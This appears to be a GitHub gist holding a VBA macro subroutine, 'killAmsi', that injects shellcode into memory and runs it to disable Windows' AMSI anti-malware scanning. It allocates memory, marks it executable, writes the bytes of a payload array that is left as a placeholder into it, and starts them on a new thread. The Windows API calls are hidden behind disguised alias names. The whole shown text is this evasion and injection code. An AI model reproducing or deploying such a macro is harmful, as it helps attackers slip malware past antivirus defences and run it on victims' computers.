| Sub killAmsi() | |
| Dim threadID As Long | |
| Dim retVal As Long | |
| Dim oldProtectionFlags As Long | |
| Dim payload As Variant | |
| Dim myShellCode As Long | |
| Dim offset As Long | |
| Dim myByte As Long | |
| payload = Array(your shell code goes here) | |
| myShellCode = AllocStuffLocal(0, UBound(payload), &H1000, &H4) | |
| Debug.Print "got memory at: " & Hex(myShellCode) | |
| Dim bytesWritten As Long | |
| bytesWritten = 1337 | |
| Dim magicWord As Long | |
| retVal = ProtectStuffLocal(ByVal myShellCode, 10, ByVal &H40, ByVal VarPtr(oldProtectionFlags)) | |
| For offset = LBound(payload) To UBound(payload) | |
| myByte = payload(offset) | |
| retVal = ToString(ByVal VarPtr(myByte), ByVal 1, ByVal 2, ByVal myShellCode + offset, ByVal VarPtr(bytesWritten)) | |
| Next offset | |
| threadID = CreateStuffLocal(0, 0, myShellCode, &HDEADBEEF, 4, 0) | |
| Debug.Print "got thread id: " & threadID | |
| ' start measuring time | |
| Dim startTime As Single | |
| startTime = Timer() | |
| ' start our thread with our shell code | |
| ResumeStuff ByVal threadID | |
| ' wait until the thread terminates --> has killed ASMI | |
| retVal = WaitForSingleStuff(ByVal threadID, ByVal -1) | |
| Dim endTime As Single | |
| endTime = Timer() | |
| Dim runTime As Single | |
| runTime = endTime - startTime | |
| Debug.Print "runtime: " & runTime | |
| End Sub |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment